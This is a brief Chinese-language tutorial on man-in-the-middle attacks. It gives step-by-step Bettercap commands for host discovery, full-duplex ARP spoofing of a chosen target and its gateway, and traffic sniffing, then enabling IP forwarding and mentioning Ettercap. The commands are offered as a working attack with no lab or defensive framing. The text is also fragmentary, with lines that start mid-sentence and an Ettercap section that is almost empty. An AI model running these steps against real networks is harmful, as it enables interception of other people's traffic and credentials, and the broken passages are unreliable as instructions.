今天的分享是中間人攻擊(MITM),會介紹兩種工具(Bettercap與Ettercap)的使用:
介紹:
-接下來將介紹使用 Bettercap 工具進行 ARP 欺騙攻擊來實施中間人攻擊。
準備:
apt-get install bettercap 進行安裝。(-y是遇到yes/no都直接幫你選yes) 
啟動 Bettercap:
bettercap 命令進入 Bettercap 框架。 
help 命令查看可用的指令和模組。模組說明:
net.probe on 啟動模組,會發送 UDP 封包給子網中的每個 IP 地址,並發現網路上的在線設備。 
arp.spoof.fullduplex:設置為 true 時,將同時攻擊目標和網關;否則僅攻擊目標。arp.spoof.targets:設置要攻擊的目標 IP 地址。net.sniff.local:設置為 true 時,僅嗅探到/從本機發送的封包。實施攻擊:
設置參數並啟動模組:
set arp.spoof.fullduplex true
set arp.spoof.targets [目標 IP 地址]
set net.sniff.local true
arp.spoof on
net.sniff on
當目標設備訪問網頁時,可以看到相關的請求封包。

自動化運行:
sniff.cap 的檔案中。bettercap -iface [網卡介面] -caplet sniff.cap

小結:
cat /proc/sys/net/ipv4/ip_forward
0,表示封包轉發未啟用,需手動啟用。 
echo 1 > /proc/sys/net/ipv4/ip_forward
1。ettercap -G(確保 "ettercap" 為小寫) 
 

 
 
 
arp -a 指令查看 ARP 快取表。